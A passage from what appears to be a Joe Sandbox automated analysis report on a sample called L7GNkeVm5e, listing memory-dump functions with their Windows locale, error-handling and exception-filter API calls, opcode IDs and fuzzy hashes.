                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                                                                                                                                                                  • Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02130A0C,?,0213BC79,00000000,?,?,?), ref: 0213B596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                                                                                                                                                                  • Instruction ID: bce122d7f27e2166cc2e70cc552d18f0a706cc7974b1af7ec0077e89226bcc1d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A1129372047055FDB189F38C89167ABB93FF80358B14442DDA4687740E771AA02CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 787680540-0
                                                                                                                                                                                                                                                  • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                  • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0213B86A,00000000,00000000,?), ref: 0213BAF8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 787680540-0
                                                                                                                                                                                                                                                  • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                  • Instruction ID: ac25e54d84d2c883e48b44add0b7fc3bd9205c839815bb382d6b32d8d2c97cfc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F0F932A88115ABDB395A248C09BFB776AEB4071CF054429ED49A3148FF70BF01C6D0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132190
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0213B8F0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2955987475-0
                                                                                                                                                                                                                                                  • Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                                                  • Instruction ID: 185c5261f136a1328247855e92beb95b3fa9ba5ce9d183d028ba9e1b57cf14a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7012632B852159BCB15AF34DD80ABE33AADF05720F0041BAEF02DB281EB759E05CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                                                  • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02130A0C,?,0213BC3D,02130A0C,?,?,?,?,?,02130A0C,?,?), ref: 0213B60B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                                                  • Instruction ID: 4b1a5de7cc9b05049270bc7af0af2c86467876147d791bb0f3ae720aea2630f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F022363047041FDB165F398C80B7A7B92EF8072CF14442CFA068B680E77199028B44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0213046A,?,00000004), ref: 0213546A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                  • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                  • Instruction ID: fc3e5666a34b67115d1a5aca60a4c6b3db6977aaac8b6ae968dd79ba228a5978
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF09631680318BFDB165F60DC05F6E7B67EF08F12F504155FD0566190DB729920AA99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                  • Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                                                                                                                                                                  • Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0212E644: RtlEnterCriticalSection.NTDLL(01CB0DA5), ref: 0212E653
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0213505C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                  • Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                                                                                                                                                                  • Instruction ID: b127a8ef4eabbd205087727b01e7991bf621c0d1035b3127976ae4b1efbd5d1a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46F03C32A50304EFEB14EF68D905B4D77F1AB09711F104166F904DB2A5C77599548F4A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                                                                                                                                                                  • Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0213BC9B,02130A0C,?,?,?,?,?,02130A0C,?,?,?), ref: 0213B510
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                                                                                                                                                                  • Instruction ID: fb074a4635942e395d922727f0228fcd8a6d53747fb2e46b1d0de731af131f18
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCF0553A34020457CB16AF35DC0476ABF92EFC1B64F0A0059EF098B240D3319942C790
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                  • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                                  • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00410662,0210FE56), ref: 021108C2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                  • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                                  • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                  • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                  • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                  • Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                                                                                                                                                                                                  • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                                                  • Instruction ID: 2f540896897679c785a348c8e19beffe016b2506aec9100bc0f06934009ae6dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D1A6321481B34ACB6D4A3A847403BFFE16A421A530E47ADF4F7CA5C6EB24D57ED660
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction ID: b280b9e37e8ab9bab3edcdf5f8d5334b7aa2b8160c034f5d44208bea97761faf
